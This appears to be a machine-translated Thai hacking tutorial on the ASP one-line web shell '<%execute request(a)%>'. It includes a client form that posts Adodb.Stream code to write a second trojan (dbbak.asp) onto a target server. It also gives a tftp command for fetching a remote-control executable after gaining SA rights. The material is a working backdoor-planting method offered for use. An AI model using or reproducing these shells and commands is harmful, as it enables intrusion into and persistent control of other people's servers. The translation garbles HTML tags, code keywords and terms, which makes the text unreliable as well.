โทรจันประโยคเดียวถูกแทรกลงในไฟล์ ASP แน่นอนว่าโทรจันประโยคเดียวนั้นเป็นไฟล์ ASP สามารถเข้าถึงได้โดยใช้ IE: เฉพาะในกรณีที่สามารถเข้าถึงได้เราก็สามารถส่งข้อมูลได้
เข้าถึงผ่านโปรโตคอล HTTP
ในหนึ่งประโยคขอบเขตการใช้งานของโทรจัน (ฉันระบุไว้เพียง 2 ประเภทเท่านั้น):
1) จำเป็นต้องสำรองฐานข้อมูลเท่านั้น
เมื่อฐานข้อมูลถูกสำรองไว้ในไฟล์ asp จะไม่เกิดข้อผิดพลาดในการคอมไพล์ และค่าสถานะการปิดสคริปต์หายไป %>
2) เมื่อตั้งค่าการอนุญาต SA คุณมักจะเขียนประโยคก่อนเพื่อความสะดวก (แน่นอนว่าการอัปโหลดนกพิราบโดยตรงผ่าน tftp และเรียกใช้จะเร็วกว่า)
tftp -i ip รับ server.exe
หลักการของม้าโทรจัน <%execute request(a)%> ในหนึ่งประโยค:
รู้ก่อน
ฟังก์ชันดำเนินการ () ใช้เพื่อดำเนินการโค้ด asp มีหน้าที่รับผิดชอบในการรันม้าที่เราอัปโหลดและส่งผ่านไปยัง asp.dll เพื่อทำการวิเคราะห์ โค้ดด้านบน <%execute request(a)%> สามารถอธิบายได้ดังนี้:
-
ถ้า request(a)<> ให้ดำเนินการ request(a)
-
หาก a ไม่ว่างเปล่า มันจะถูกดำเนินการ อะไรจะเกิดขึ้น?...
ถ้า != 0
มาดูลูกค้ากันดีกว่า:
<การกระทำของแบบฟอร์ม=http://192.168.0.28/shell.asp method=post>
<ชื่อ textarea=l cols=120 แถว=10 ความกว้าง=45>
set lP=server.CreateObject(Adodb.Stream) 'สร้างส่วนประกอบ Adobb.Stream..
ลป.เปิด
lP.ประเภท=2
lP.CharSet=gb2312
lP.writetext คำขอ (p)
lP.SaveToFile server.mappath(dbbak.asp),2
ลป.ปิด
ตั้งค่า lP=ไม่มีอะไร
การตอบสนอง เปลี่ยนเส้นทาง dbbak.asp
</ข้อความ>
<textarea name=p cols=120 rows=10 width=45>ข้อมูลที่จะส่ง</textarea><BR><center><br>
<ประเภทอินพุต=ค่าส่ง=ส่ง>
Adobe.Stream มีหน้าที่อัปโหลดข้อมูลการอ่านไปยังเซิร์ฟเวอร์:
คอมโพเนนต์: Adobeb.Stream
มีวิธีดังต่อไปนี้:
ยกเลิกวิธีการ
วิธีการใช้งาน
วัตถุยกเลิก
คำอธิบาย: ยกเลิกการดำเนินการของการเรียกใช้เมธอด Execute หรือ Open แบบอะซิงโครนัสที่รอดำเนินการ
วิธีการเขียนข้อความ
วิธีใช้:
Object.Write (ข้อมูล, [ตัวเลือก])
คำอธิบาย: โหลดข้อมูลข้อความที่ระบุลงในออบเจ็กต์
คำอธิบายพารามิเตอร์: ข้อมูลคือเนื้อหาที่ระบุที่จะเขียน
ตัวเลือก ตัวเลือกในการเขียนซึ่งสามารถไม่ระบุได้ พารามิเตอร์ทางเลือกมีดังนี้:
adWriteChar =0
adWriteLine =1
วิธีการ SaveToFile
วิธีใช้:
Object.SaveToFile(ชื่อไฟล์,[ตัวเลือก])
คำอธิบาย: เขียนเนื้อหาของออบเจ็กต์ลงในไฟล์ที่ระบุโดย FileName
นั่นคือชื่อไฟล์ที่เราบันทึกโทรจันคือ dbbak.asp
คำอธิบายพารามิเตอร์: ไฟล์ที่ระบุโดย FileName
ตัวเลือกการเข้าถึงตัวเลือก ซึ่งสามารถปล่อยไว้โดยไม่ระบุ พารามิเตอร์ทางเลือกมีดังนี้:
adSaveCreateNotExist =1
adSaveCreateOverWrite =2
หลังจากส่งประโยคโทรจัน ค่าของ a จะว่างเปล่าและกำลังรอค่าที่เขียน การเข้าถึง http://www.***.com/**.asp เป็นกระบวนการรอวิธีเตรียมการดำเนินการโดยใช้การดำเนินการ ( ) การทำงาน.. .
สร้าง Adodb.Stream ทำหน้าที่เขียนข้อมูลของเราลงเซิร์ฟเวอร์...
ในเวลาเดียวกัน ตัวแปร SaveToFile ที่กำหนดโดยส่วนประกอบนี้จะกำหนดชื่อชาวมาเลเซียของเรา..dbbak.asp
หลังจากส่งไปยังเซิร์ฟเวอร์แล้ว ฟังก์ชันดำเนินการ () จะตรวจพบว่าค่าของ a ไม่ว่างเปล่า ดังนั้นจึงดำเนินการมาเลเซียของเรา!